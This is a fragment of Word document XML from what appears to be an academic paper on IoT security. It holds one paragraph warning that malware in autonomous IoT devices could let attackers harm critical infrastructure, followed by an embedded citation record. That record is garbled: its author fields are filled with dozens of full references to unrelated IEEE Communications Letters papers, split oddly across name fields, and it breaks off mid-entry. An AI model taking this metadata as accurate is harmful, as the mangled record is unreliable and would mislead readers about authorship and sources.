    <w:p w14:paraId="14CC8CEE" w14:textId="06475451" w:rsidR="007B1930" w:rsidRDefault="007B1930" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797A5055" w14:textId="24A0DDC7" w:rsidR="007B1930" w:rsidRDefault="0021261F" w:rsidP="009325A0">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>However,</w:t>
      </w:r>
      <w:r w:rsidR="007B1930">
        <w:t xml:space="preserve"> these self-sufficient IoT devices pose a much greater cybersecurity threat if the inefficient security trend within IoT devices continues that was discussed within the </w:t>
      </w:r>
      <w:r w:rsidR="007B1930" w:rsidRPr="00976BEE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r w:rsidR="007B1930">
        <w:t xml:space="preserve">section of this paper, because </w:t>
      </w:r>
      <w:r w:rsidR="003E61B4">
        <w:t xml:space="preserve">if malware could be installed within the </w:t>
      </w:r>
      <w:r w:rsidR="003E61B4">
        <w:t xml:space="preserve">future advanced IoT M2M devices attackers would have much greater control of a large number of ad-hoc networked IoT devices </w:t>
      </w:r>
      <w:r w:rsidR="00C10431">
        <w:t>that could have sever</w:t>
      </w:r>
      <w:r w:rsidR="00480430">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00C10431">
        <w:t xml:space="preserve"> harmful effects to life if critical infrastructure was exploited such as the public train transport system</w:t>
      </w:r>
      <w:r w:rsidR="005612F2">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C10431">
        <w:t>, smart cars and road, industrial devices etc</w:t>
      </w:r>
      <w:r w:rsidR="001403F8">
        <w:t xml:space="preserve"> without being proactively monitored to mitigate the attack before damage has been done from such an attack. </w:t>
      </w:r>
      <w:r w:rsidR="00F04EEE">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="008366B4">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1109/LCOMM.2016.2532330","ISBN":"1089-7798 VO - 20","abstract":"Based on LDoS, we propose bots multiplexing in multitargets attack scenario, and then present the LDoS attack ability enhancing method. In simulation, the method shows good performance and adaptability, it can enhance attack ability effectively under variety of correlated parameters. With this method, the attacker may use a small botnet to cause very great harm, which only large botnet can cause by traditional method. Furthermore, aimed to this threat, we discuss two mitigation strategies.","author":[{"dropping-particle":"","family":"Han, Y., &amp; Lee","given":"J. (2016). Uplink Pilot Design for Multi-Cell Massive MIMO Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2571697","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, W., Deng, Y., Li, B., Zhao, C., &amp; Nallanathan","given":"A. (2016). Eavesdropper Localization in Random Walk Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2592898","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yousefi, S., Wymeersch, H., Chang, X. W., &amp; Champagne","given":"B. (2016). Tight Two-Dimensional Outer-Approximations of Feasible Sets in Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518186","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Badarneh, O. S., &amp; Almehmadi","given":"F. S. (2016). Performance of Multihop Wireless Networks in &lt;inline-formula&gt; &lt;img src=“/images/tex/451.gif” alt=“\\alpha ”&gt; &lt;/inline-formula&gt;-&lt;inline-formula&gt; &lt;img src=“/images/tex/241.gif” alt=“\\mu”&gt; &lt;/inline-formula&gt; Fading Channels Perturbed&amp;#x00A0;by an","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wolf, A., Gonz&amp;#x00E1;lez, D. C., Filho, J. C. S. S., &amp; Fettweis","given":"G. (2016). Asymptotically Optimal Power Allocation for WSNs With Mutually Correlated Sensing Data. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2561921","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fang, W., Zeng, M., Liu, X., Lu, W., &amp; Zhu","given":"Z. (2016). Joint Spectrum and IT Resource Allocation for Efficient VNF Service Chaining in Inter-Datacenter Elastic Optical Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2580151","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mishra, A. K., Mallick, D., &amp; Singh","given":"P. (2016). Combined Effect of RF Impairment and CEE on the Performance of Dual-Hop Fixed-Gain AF Relaying. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585479","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Song, L., Liao, Y., Bian, K., Song, L., &amp; Han","given":"Z. (2016). Cross-Layer Protocol Design for CSMA/CD in Full-Duplex WiFi Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519518","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Messai, M., Piemontese, A., Colavolpe, G., Amis, K., &amp; Guilloud, F. (2016). Binary CPMs With Improved Spectral Efficiency. IEEE Communications Letters, 20(1)","given":"85–88. https://doi.org/10.1109/LCOMM.2015.2502247","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pan, M. S., Lin, T. M., Chiu, C. Y., &amp; Wang","given":"C. Y. (2016). Downlink Traffic Scheduling for LTE-A Small Cell Networks With Dual Connectivity Enhancement. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2522404","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Al-Hourani, A., Evans, R. J., &amp; Kandeepan","given":"S. (2016). Nearest Neighbor Distance Distribution in Hard-Core Point Processes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2591017","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Duan, R., Liu, R., Shirvanimoghaddam, M., Li, Y., &amp; Chen, C. W. (2016). A Low PAPR Constellation Mapping Scheme for Rate Compatible Modulation. IEEE Communications Letters, 20(2)","given":"256–259. https://doi.org/10.1109/LCOMM.2015.2508027","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sakai, M., Lin, H., &amp; Yamashita","given":"K. (2016). Joint Estimation of Channel and I/Q Imbalance in OFDM/OQAM Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2506173","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Dong, Y., Hossain, M. J., &amp; Cheng, J. (2016). Performance of Wireless Powered Amplify and Forward Relaying Over Nakagami- Fading Channels With Nonlinear Energy Harvester. IEEE Communications Letters, 20(4)","given":"672–675. https://doi.org/10.1109/LCOMM.2016.2528260","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, Y., &amp; Cao","given":"H. (2016). An Upper Bound on the Capacity of Distributed MIMO Systems With Rician/Lognormal Fading. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509981","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, S., &amp; Zhou","given":"Q. (2016). Tree Analysis of BATS Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2499192","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Jamali, V., Waly, N., Zlatanov, N., &amp; Schober","given":"R. (2016). Optimal Buffer-Aided Relaying With Imperfect CSI. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2559458","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhou, B., Wang, J., Li, S., Wang, W., Cheng, Y., &amp; Wu","given":"J. (2016). A Secure Scheme Based on Layer Model in Multi-Phase Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2561999","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pimentel","given":"C. (2016). On the Weight Enumerator of Periodically Time-Varying Convolutional Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2514091","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mansourkiaie, F., &amp; Ahmed","given":"M. H. (2016). Per-Node Traffic Load in Cooperative Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503277","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Pag&amp;#x00E8;s, A., Perell&amp;#x00F3;, J., Agraz, F., &amp; Spadaro","given":"S. (2016). Optimal VDC Service Provisioning in Optically Interconnected Disaggregated Data Centers. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2558457","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ylmaz, M. H., &amp; Arslan","given":"H. (2016). Resource Allocation With Partially Overlapping Filtered Multitone in Cognitive Heterogeneous Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2535140","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kiasaleh","given":"K. (2016). Statistical Profile of Hermite&amp;#x2013;Gaussian Beam in the Presence of Residual Spatial Jitter in FSO Communications. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517624","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Y., Tian, B., Yi, K., Yu, Q., Sun, D., &amp; Liu","given":"Z. (2016). A Robust NDA Carrier Tracking Method for LDPC-Coded Systems With Symbol Rate Sampling. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501360","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zhang, X., Tao, L., &amp; Zhou","given":"F. (2016). Energy Efficient Switch-Based Packet Forwarding for Low Duty-Cycle Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539939","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Diez, L., Popescu, G. P., &amp; Ag&amp;#x00FC;ero","given":"R. (2016). A Geometric Programming Solution for the Mutual-Interference Model in HetNets. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2592914","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sun, Z., Xiao, Y., You, L., Yin, L., Yang, P., &amp; Li","given":"S. (2016). Cross-Entropy-Based Antenna Selection for Spatial Modulation. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518662","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, B., Jayakody, D. N. K., &amp; Flanagan","given":"M. F. (2016). Distributed Low-Density Lattice Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497679","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hu","given":"Y. (2016). Comments and Reply Comments on &amp;#x201C;Cooperative Density Estimation in Random Wireless Ad Hoc Networks&amp;#x201D; IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2532881","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Choi","given":"J. (2016). On the Power Allocation for a Practical Multiuser Superposition Scheme in NOMA Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2518165","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hao, J., &amp; Xia","given":"S. T. (2016). Constructions of Optimal Binary Locally Repairable Codes With Multiple Repair Groups. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539160","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Le","given":"K. N. (2016). On Selection Combiner Output Quadrivariate Cumulative Distribution Functions in Correlated Nakagami-&lt;inline-formula&gt; &lt;img src=“/images/tex/21177.gif” alt=“m”&gt; &lt;/inline-formula&gt; and Rayleigh Fading. IEEE Communications Letters. https://doi.or","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, D., Li, Y., Guo, X., &amp; Sun","given":"Y. (2016). Ordered Statistic Decoding for Short Polar Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539170","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wu, K., Lu, P., &amp; Zhu","given":"Z. (2016). Distributed Online Scheduling and Routing of Multicast-Oriented Tasks for Profit-Driven Cloud Computing. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2526001","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ahmed, M. A., &amp; Tsimenidis","given":"C. C. (2016). A Tight Upper Bound on the Performance of Iterative Detection and Decoding for Coded Full-Duplex SIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2510649","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Awin, F. A., Abdel-Raheem, E., &amp; Ahmadi","given":"M. (2016). Designing an Optimal Energy Efficient Cluster-Based Spectrum Sensing for Cognitive Radio Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2585126","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Su, Y., Jiang, L., &amp; He","given":"C. (2016). Joint Relay Selection and Power Allocation for Full-Duplex DF Co-Operative Networks With Outdated CSI. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2520944","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ge, X., Jin, H., &amp; Leung","given":"V. C. M. (2016). CDF-Based Scheduling Algorithm for Proportional Throughput Fairness. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2544750","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nie, G., Tian, H., &amp; Ren","given":"C. (2016). Energy Efficient Cell Selection in Small Cell Networks With Constrained Backhaul Links. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550457","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Dong, Y., Hossain, M. J., &amp; Cheng","given":"J. (2016). Joint Power Control and Time Switching for SWIPT Systems With Heterogeneous QoS Requirements. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498151","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Song, Y., Sung, K. W., &amp; Han","given":"Y. (2016). Coexistence of Wi-Fi and Cellular With Listen-Before-Talk in Unlicensed Spectrum. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504509","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kraidy","given":"G. M. (2016). On Progressive Edge-Growth Interleavers for Turbo Codes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504364","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Krikidis","given":"I. (2016). SWIPT in 3-D Bipolar Ad Hoc Networks With Sectorized Antennas. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2557319","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tao","given":"J. (2016). On Low-Complexity Soft-Input Soft-Output Decision-Feedback Equalizers. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2556681","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, G., Gong, Y., Xiao, P., &amp; Tafazolli","given":"R. (2016). Dual Antenna Selection in Self-Backhauling Multiple Small Cell Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2570226","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Raza, M. A., &amp; Hussain","given":"A. (2016). Maximum Likelihood SNR Estimation of Hyper Cubic Signals Over Gaussian Channel. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498146","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wei, J., &amp; Yu","given":"C. (2016). Performance Evaluation of Practical Passive Source Localization Using Two Software Defined Radios. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2582797","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Georgiou","given":"O. (2016). Polarized Rician Fading Models for Performance Analysis in Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2553018","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Boulogeorgos, A. A. A., Chatzidiamantis, N. D., &amp; Karagiannidis","given":"G. K. (2016). Spectrum Sensing With Multiple Primary Users Over Fading Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2554545","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Fafoutis, X., Tsimbalo, E., &amp; Piechocki","given":"R. (2016). Timing Channels in Bluetooth Low Energy. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2574311","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ricciato, F., Sciancalepore, S., &amp; Boggia","given":"G. (2016). Tracing a Linearly Moving Node From Asynchronous Time-of-Arrival Measurements. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2584600","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, Y., Yin, X., &amp; Wang","given":"X. (2016). Two New Classes of Two-Parity MDS Array Codes With Optimal Repair. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2569077","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mathur, A., Bhatnagar, M. R., &amp; Panigrahi","given":"B. K. (2016). On the Performance of a PLC System Assuming Differential Binary Phase Shift Keying. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2527002","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Leonardo, E. J., Yacoub, M. D., &amp; Souza","given":"R. A. A. de. (2016). Ratio of Products of &lt;inline-formula&gt; &lt;img src=“/images/tex/451.gif” alt=“\\alpha ”&gt; &lt;/inline-formula&gt;-&lt;inline-formula&gt; &lt;img src=“/images/tex/241.gif” alt=“\\mu”&gt; &lt;/inline-formula&gt; Variates. IEEE Communications Letters. https://doi.org/","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Colonnese, S., Russo, S., Cuomo, F., Melodia, T., &amp; Rubin","given":"I. (2016). Timely Delivery Versus Bandwidth Allocation for DASH-Based Video Streaming Over LTE. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2516001","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nguyen, V. D., Nguyen, H. V, &amp; Shin","given":"O. S. (2016). An Efficient Zero-Forcing Precoding Design for Cognitive MIMO Broadcast Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2576445","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yuan, Z., Xu, J., Xue, Y., &amp; Schaar","given":"M. v. der. (2016). Bits Learning: User-Adjustable Privacy Versus Accuracy in Internet Traffic Classification. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2521837","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Morvari, F., &amp; Ghasemi","given":"A. (2016). Two-Stage Resource Allocation for Random Access M2M Communications in LTE Network. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2539159","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park","given":"D. (2016). Secrecy Sum Rates of MIMO Multi-Receiver Wiretap Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2586889","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, Z., &amp; Haas","given":"Z. J. (2016). On Residual Path Lifetime in Mobile Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2520467","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, J., Zhuang, H., &amp; Luo","given":"Z. (2016). Energy Optimization in Dense OFDM Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2500584","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, J., Xiao, L., Xu, X., &amp; Zhou","given":"S. (2016). Robust and Low Complexity Hybrid Beamforming for Uplink Multiuser MmWave MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2542161","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park, Y. D., Jeon, S., Kim, K., &amp; Suh","given":"Y. J. (2016). RAMCAST: Reliable and Adaptive Multicast Over IEEE 802.11n WLANs. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2566642","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sami, M., Noordin, N. K., &amp; Khabazian","given":"M. (2016). A TDMA-Based Cooperative MAC Protocol for Cognitive Networks With Opportunistic Energy Harvesting. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2525784","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Wang, R., Li, Y., &amp; Zhao","given":"H. (2016). Nonbinary Protograph-Based LDPC Codes Based on Additive Group of Finite Field. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2524001","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Femminella, M., Reali, G., &amp; Valocchi","given":"D. (2016). A Signaling Protocol for Service Function Localization. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2564960","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"So, J., &amp; Sung","given":"Y. (2016). Improving Non-Orthogonal Multiple Access by Forming Relaying Broadcast Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2592901","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Ermolova, N. Y., &amp; Tirkkonen","given":"O. (2016). Using Beta Distributions for Modeling Distances in Random Finite Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2509971","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Chen, Z., &amp; Quek","given":"T. Q. S. (2016). Coherent Signaling for Full-Duplex Relay Channel With Self-Interference. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2582794","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sykora","given":"J. (2016). Hierarchical Pairwise Error Probability for Hierarchical Decode and Forward Strategy in PLNC. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498164","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Park, J., Jang, C., &amp; Lee","given":"J. H. (2016). Outage Analysis of Underlay Cognitive Radio Networks With Multihop Primary Transmission. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2523989","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mattos, D. M. F., Duarte, O. C. M. B., &amp; Pujolle","given":"G. (2016). Reverse Update: A Consistent Policy Update Scheme for Software-Defined Networking. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2546240","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Gao, Z., Hu, C., Dai, L., &amp; Wang","given":"Z. (2016). Channel Estimation for Millimeter-Wave Massive MIMO With Hybrid Precoding Over Frequency-Selective Fading Channels. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2555299","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Kanwal, K., &amp; Safdar","given":"G. A. (2016). Reduced Early Handover for Energy Saving in LTE Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2503280","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Al-Doori, B., &amp; Liu","given":"X. (2016). Dynamic Joint Carrier Aggregation Group Formation and Interference Alignments for Femtocell in LTE-A. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2580502","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Xu, M., Ji, F., Wen, M., &amp; Duan","given":"W. (2016). Novel Receiver Design for the Cooperative Relaying System With Non-Orthogonal Multiple Access. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2575011","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hemati, S., Leduc-Primeau, F., &amp; Gross","given":"W. J. (2016). A Relaxed Min-Sum LDPC Decoder With Simplified Check Nodes. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2517142","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Aydin, E., &amp; Ilhan, H. (2016). A Novel SM-Based MIMO System With Index Modulation. IEEE Communications Letters, 20(2)","given":"244–247. https://doi.org/10.1109/LCOMM.2015.2512269","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Zayyani, H., Korki, M., &amp; Marvasti","given":"F. (2016). A Distributed 1-bit Compressed Sensing Algorithm Robust to Impulsive Noise. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2550589","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Feng, T., Kai, Z., &amp; Liang","given":"C. (2016). Unambiguous Tracking of BOC Signals Using Coherent Combination of Dual Sidebands. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2569520","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nguyen, H. H., Hasegawa, M., &amp; Hwang","given":"W. J. (2016). Distributed Resource Allocation for D2D Communications Underlay Cellular Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2498925","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Mani, H., &amp; Saeedi","given":"H. (2016). Message Passing-Based Decoding of Convolutional Codes: Performance and Complexity Analysis. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2508459","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Li, G., Zhao, Y., &amp; Bian","given":"K. (2016). Efficient User Association in Cellular Networks With Hybrid Cognitive Radio Relays. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2560818","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Qin, X., Yan, Z., &amp; He","given":"G. (2016). A Near-Optimal Detection Scheme Based on Joint Steepest Descent and Jacobi Method for Uplink Massive MIMO Systems. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2504506","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Tang, C., Qi, Y., &amp; Huang","given":"D. (2016). Two-Weight and Three-Weight Linear Codes From Square Functions. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2497344","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Esmaeili, M., &amp; Gulliver, T. A. (2016). A Secure Code Based Cryptosystem via Random Insertions,&amp;#x00A0;Deletions","given":"#x00A0;and&amp;#x00A0;Errors. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2540625","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Sandell, M., Tosato, F., &amp; Ismail, A. (2016). Low Complexity Max-log LLR Computation for Nonuniform PAM Constellations. IEEE Communications Letters, 20(5)","given":"838–841. https://doi.org/10.1109/LCOMM.2016.2535116","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Guo, S., Zhang, H., Jin, S., &amp; Zhang","given":"P. (2016). Spatial Modulation via 3-D Mapping. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2556685","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Quan, L., Xiao, S., Xue, X., &amp; Lu","given":"C. (2016). Neighbor-Aided Spatial-Temporal Compressive Data Gathering in Wireless Sensor Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2519031","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Yang, L., Yang, T., Xie, Y., Yuan, J., &amp; An","given":"J. (2016). Multiuser Decoding Scheme for &lt;inline-formula&gt; &lt;img src=“/images/tex/523.gif” alt=“K”&gt; &lt;/inline-formula&gt;-user Fading Multiple-Access Channel Based on Physical-Layer Network Coding. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Nasir, A. A., Tuan, H. D., Ngo, D. T., Durrani, S., &amp; Kim","given":"D. I. (2016). Path-Following Algorithms for Beamforming and Signal Splitting in RF Energy Harvesting Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2578921","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lu, Y., Zhao, Y., Sun, F., &amp; Qin","given":"D. (2016). Complexity of Routing in Store-and-Forward LEO Satellite Networks. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2015.2501399","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Noh, W., Lim, J. B., Shin, W., Lim, S. H., Kim, T. s., Lee, T. D., &amp; Han","given":"K. (2016). Adaptive Transmission Control in Multiple Interference Neutralization Groups. IEEE Communications Letters. https://doi.org/10.1109/LCOMM.2016.2514497","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Vijayakumaran, S., &amp; Pal","given":"D. (2016). On the Minimum Redundancy of SEC-DAEC-TAEC Binary Linear Block Codes. IEEE Communications Letters. 